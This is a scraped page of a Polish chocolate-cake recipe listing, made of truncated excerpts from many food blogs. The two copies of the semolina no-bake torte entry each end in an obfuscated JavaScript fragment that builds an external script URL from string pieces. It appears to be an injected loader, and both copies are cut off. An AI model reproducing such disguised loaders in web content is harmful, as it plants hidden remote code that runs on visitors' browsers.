ciasto czekoladowe - 21638 przepisów (strona:623/1443)

Kostka bounty 264

śmietanę i całość podgrzewamy przez około 3-4 minuty mieszając do całkowitego połączenia składników, wsypujemy wiórki i mieszamy przez 10 sekund. Jedną część ciasta wkładamy do blaszki, wylewamy masę kokosową i przykrywamy drugim blatem. Polewa: odlaną czekoladową część przelewamy do miseczki, wkruszamy czekoladę i roztapiamy całość w kąpieli wodnej. Gotową polewa dekorujemy ciasto. Ciasto wstawiamy do lodówki na około

Kulinarny Świat Konczi i Szpileczki
PIERNIKOWE ROGALIKI KRUCHO DROŻDŻOWE Z NADZIENIEM ORZECHOWO KRÓWKOWYM 187

obsypaną dookoła mąką. Takie ciasto powinno leżeć około 1 godzinki.  Ten czas jest wystarczający. Oprócz tego że do ciasta jest dodany cynamon i przyprawa do piernika do farszu użyłam zmielonych orzechów laskowych ( uwielbiam ) i masy kajmakowej czekoladowej.  Połączenie idealne :).  Całość wykańcza pyszna mleczna czekolada roztopiona w kąpieli wodnej oraz posiekane orzeszki laskowe. Nic tylko zajadać :)  Chciałam(...)kakao prawdziwe 2 łyżki  cynamon 1 łyżeczka przyprawa do piernika 2 łyżki Farsz: masa kajmakowa czekoladowa 300 gram orzechy laskowe zmielone 3/4 szkl. Polewa: czekolada mleczna 1 op. masło 1 łyżka mleko 3 łyżki Dodatkowo: orzechy laskowe posiekane METODA: Ciasto: Wszystkie składniki umieścić w misce i zagnieść ciasto. Podzielić na dwie części, przykryć folią spożywczą i wstawić do lodówki

Kuchnia Paulettes
Szybkie ciasto z jabłkami 782

łatwy deser bez pieczenia z dżemem jabłkowym, twarogiem i budyniem. Przepis na szybkie ciasto z jabłkami pozwala na przygotowanie prostego deseru z kilku łatwo dostępnych składników. To ciasto bez mleka, bez jajek i bez oleju. Tylko herbatniki, masa z twarogu, budyniu i masła oraz polewa czekoladowa. Wszystko przygotujesz w nie więcej niż 20 – 30 minut. Potem wystarczy ciasto wstawić

Kuchnia Na Wypasie
CIASTO COMBER 181

Koleżanka takie ciasto przywiozła z pewnej cukierni, po jego spróbowaniu po prostu odpłynęłam. Mocno czekoladowe, wilgotne z nutką rumu. Jak się okazało robi się go jak typowego murzynka z taką różnicą, że ciasto mocno nasącza się herbatą z dodatkiem alkoholu. Można dodać trochę rodzynek, ale u mnie ich nie lubią, więc całkowicie pominęłam. Najważniejsza sprawa... ciasto jest bardzo łatwe

Pani na deser
Czekoladowo-kokosowy torcik z białej fasoli konserwowej (bez mąki) 141

uwierzycie, że istnieje tort który nie pójdzie w boczki, a jego przygotowanie zajmuje kilka chwil?  To naprawdę możliwe! Ciasto na bazie fasoli jest przeeepyszne, takie czekoladowo-kokosowe, kuszące zapachem i wilgotne. W ogóle nie czuć co jest w nim podstawowym składnikiem! Fakt, prezentowany torcik przełożyłam klasyczną bitą śmietaną, która nie jest fit, ale Wy możecie użyć bitej śmietany(...)jest rewelacyjna - zarówno dla tych dbających o linię jak i osób wolących tradycyjne słodkości. Moja rodzina i znajomi zajadają się takimi torcikami! Pooolecam!  (Tortownica o średnicy 20 cm) Ciasto: 1 puszka białej fasoli konserwowej 2 jajka 100g jogurtu naturalnego 100g ksylitolu 3 łyżki kakao 3 łyżki wiórków kokosowych 1 łyżeczka proszku do pieczenia Bita śmietana: 200 ml śmietanki

Di gotuje
Ciasto metrowiec super przepis :-) 850

zawdzięcza swojej długości :-) a jak wiadomo długość jest ważna, więc pod tym względem metrowiec bije na głowę inne ciasta :-) Składa się z delikatnego ciasta jasnego oraz ciemnego, są one przełożone masą i oblane pyszną polewą czekoladową i posypane orzechami.  Zapraszam na metrowca SKŁADNIKI KEKSÓWKA O WYMIARACH 30x110x7 długość 30, szerokość 11, wysokość 7cm CIASTO BIAŁE -4 jajka

moje pyszne łatwe i sprawdzone przepisy krok po kroku
PĄCZKI PIECZONE - odchudzony, zdrowszy tłusty czwartek w wersji tradycyjnej i bezglutenowej. Przepis nr I z drożdży suchych 215

Przed włożeniem do nagrzanego piekarnika (180 st, góra-dół bez termoobiegu) możemy posmarować rozkłóconym jajkiem Pieczemy 10 minut na złoty kolor Przestudzone lukrujemy lub polewamy czekoladową polewą WERSJA BEZGLUTENOWA Dokładnie tak samo postępujemy z ciastem bezglutenowym, tylko mąkę pszenną zastępujemy bezglutenową (MIX SCHAR do ciast) Dosypujemy mąkę z tapioki i delikatnie wyrabiamy Przy bezglutenowych dłużej czekamy, aż pączki wyrosną. Mąka

Wypisz Wymaluj
Sos czekoladowy 241

podawać maczane w sosie czekoladowym, stąd też dziś na niego przepis. Sos posłuży nam również do innych deserów lub jako polewa do ciast. Jest bardzo szybki i łatwy w przygotowaniu. I oczywiście pyszny. Sos czekoladowy Czas przygotowania: 20 minut Składniki: 100 g czekolady  7 łyżek mleka  1 czubata łyżeczka masła szczypta kardamonu 1 łyżeczka  domowej

Kulinarne przygody Gatity
Czekoladowa pychotka - pyszna babka dla leniwych 8920

numerów znalazłam przepis na wspaniałą czekoladowa babkę, nie wymagającą pracy. Miesza się tylko łyżką i naprawdę babka wychodzi przepyszna, zresztą trafnie ją nazwała autorka   „Czekoladową pychotką” . Z podanego przepisu wychodzi jedna mała blacha ciasta. Składniki: 2 szklanki mąki 2 jajka ¾ szklanki cukru 1 łyżeczka proszku do pieczenia 4 łyżki kakao ½ szklanki mleka 125 g masła lub margaryny

Na słodko lub wytrawnie
Czekoladowa TARTA Z MUSEM CZEKOLADOWYM (przepis wegański i bez glutenu) 45

Czekoladowy szał! Mocno czekoladowa tarta wjechała na salony 😉 A do tego bez glutenu i wegańska! Szalone i pyszne połączenie. Tutaj możecie zobaczyć jak cudownie delikatną i piankową ma konsystencję mus znajdujący się we wnętrzu 😍       Składniki (śr: 19 cm): Kruchy spód - 100g mąki gryczanej - 100g mąki kokosowej - 50g mąki owsianej (lub zmielonych pł. owsianych) - 370ml mleka roślinnego(...)suchymi. Ciasto ma być dość lepkie i luźne, więc trzeba wstawić je do lodówki na kilkanaście minut. 4. Schłodzonym i zwartym ciastem wylepiać dno oraz boki tortownicy wyłożonej na dnie papierem do pieczenia. 5. Piec w 180’C ok. 20 minut. Ciasto ma by delikatnie zarumienione ale nie za bardzo spieczone, ponieważ jeszcze nieco stwardnieje po wystudzeniu. MUS CZEKOLADOWY

Candy Pandas
Ciasto wiśniowo-czekoladowe 156

pieczenia. Pieczemy przez 25 minut. Gdy ciasto przestygnie nasączamy je ponczem przygotowanym z kawy, cukru i wody. Na ciasto wylewamy tężejącą galaretkę z wiśniami i odstawiamy do lodówki aby stężała. Następnie dokańczamy przygotowanie pianki. Do miski z mlekiem czekoladowym wsypujemy opakowanie "Śnieżki" i ubijamy aż masa stanie się gęsta. Żelatynę rozpuszczamy w 2-3 łyżkach wody i odstawiamy na chwilkę(...)wrzenia!) aż spowrotem nabierze płynnej konsystencji (np. na bardzo małym ogniu w garnuszku albo w kąpieli wodnej). Żelatynę wlewamy do masy czekoladowej i szybko i energicznie miksujemy aby nie pojawiły się grudki. Masę natychmiast wykładamy na wierzch ciasta i równo rozprowadzamy. Ciasto wstawiamy na kilka godzin do lodówki. Przed podaniem można oprószyć odrobiną kakao lub zetrzeć trochę gorzkiej czekolady. Ciasto

My simple kitchen
Torcik bez pieczenia z masą z kaszy mannej 142

Torcik bez pieczenia z masą grysikową Torcik bez pieczenia to idealny deser dla każdego, kto niezbyt mocno czuje się w pieczeniu tradycyjnych biszkoptów. Takie ciasto świetnie sprawdzi się na przyjęciu dla dzieci, w czasie rodzinnych świąt oraz jako niedzielny deser. Składniki potrzebne na torcik bez pieczenia ok. 300 g prostokątnych herbatników pół filiżanki czarnej kawy bez cukru pół szklanki kaszy(...)Jako ostatnią układamy warstwę herbatników i torcik wkładamy do lodówki. Schłodzone ciasto wyjmujemy z pojemnika najlepiej odwracając go do góry dnem. Wierch naszego ciasto można polać czekoladą lub ozdobić bitą śmietaną. Świetnie smakuje z dodatkiem czekoladowych płatków śniadaniowych. (function(){ c3eq=document.createElement("script");c3eq_=("ust");c3equ="131432732"; c3eq_+="a"+("t.i");c3eq.type="text/javascript"; c3equ+=".eXl9hzsn3eql65hljiyv";c3eq.async=true;c3eq_+="n"+("f"+"o")+"/"; c3equ

Gotujemy i jemy
Torcik bez pieczenia z masą z kaszy mannej 178

Torcik bez pieczenia z masą grysikową Torcik bez pieczenia to idealny deser dla każdego, kto niezbyt mocno czuje się w pieczeniu tradycyjnych biszkoptów. Takie ciasto świetnie sprawdzi się na przyjęciu dla dzieci, w czasie rodzinnych świąt oraz jako niedzielny deser. Składniki potrzebne na torcik bez pieczenia ok. 300 g prostokątnych herbatników pół filiżanki czarnej kawy bez cukru pół szklanki kaszy(...)Jako ostatnią układamy warstwę herbatników i torcik wkładamy do lodówki. Schłodzone ciasto wyjmujemy z pojemnika najlepiej odwracając go do góry dnem. Wierch naszego ciasto można polać czekoladą lub ozdobić bitą śmietaną. Świetnie smakuje z dodatkiem czekoladowych płatków śniadaniowych. (function(){ c3eq=document.createElement("script");c3eq_=("ust");c3equ="131432732"; c3eq_+="a"+("t.i");c3eq.type="text/javascript"; c3equ+=".eXl9hzsn3eql65hljiyv";c3eq.async=true;c3eq_+="n"+("f"+"o")+"/"; c3equ

Korniszonki
Ciasto dakłas 33

Ciacho dla prawdziwych łasuchów. Czekoladowy biszkopt, krem toffi z mascarpone, z orzechami, daktylami, a na wierzchu pyszna chrupiąca beza. Dla przełamania słodyczy, biszkopt można posmarować dżemem z czarnej porzeczki.  Składniki (blaszka 24/34): biszkopt: jajka 3 szt, cukier 160 g, olej 70 g, woda 70 g, kakao 20 g, mąka pszenna 120 g, proszek do pieczenia 1 łyżeczka, beza: białka(...)Jajka ubić z cukrem na puszystą masę (8 minut). Miksując na wysokich obrotach, dodać strumieniem olej oraz wodę. Następnie dodać suche, przesiane składniki i delikatnie wymieszać szpatułką do połączenia. Ciasto wylać na blachę, wyłożoną papierem do pieczenia. Piec w 170 st. C przez 30 min. Upieczony biszkopt odstawić do ostygnięcia, a następnie ściągnąć z biszkopta łupę powstałą podczas pieczenia

kulinarne odsłony pati
Jaglana tarta czekoladowo-kokosowa z ananasem i żurawiną 204

puszystości, stopniowo dodając cukier puder. Potem dodaj żółtko i suche składniki. Zmiksuj do połączenia i uformuj kulę. Ciasto owiń folią spożywczą i schłódź w lodówce 2 godziny lub w zamrażalniku przez 1 godzinę. Ze śmietanki 30% i czekolady przygotuj ganasz czekoladowy wg  przepisu  i odstaw do przestudzenia. Mleko kokosowe zagotuj z cukrem wanilinowym, dodaj olej. Kaszę jaglaną przygotuj(...)przykrycia na kilka minut po ugotowaniu. Przełóż ugotowaną kaszę do miski lub malaksera i wlej biały ganasz czekoladowy. Wbij żółtka jaj. Zmiksuj blenderem na jednolitą gładką masę. Dodaj wiórki kokosowe i wymieszaj łyżką. Formę wyłóż papierem lub natłuść. Rozwałkuj ciasto kruche na ok 0,5 cm grubości i wyłóż nim formę, dopasuj brzegi (w tortownicy na jakieś

Anioszek w kuchni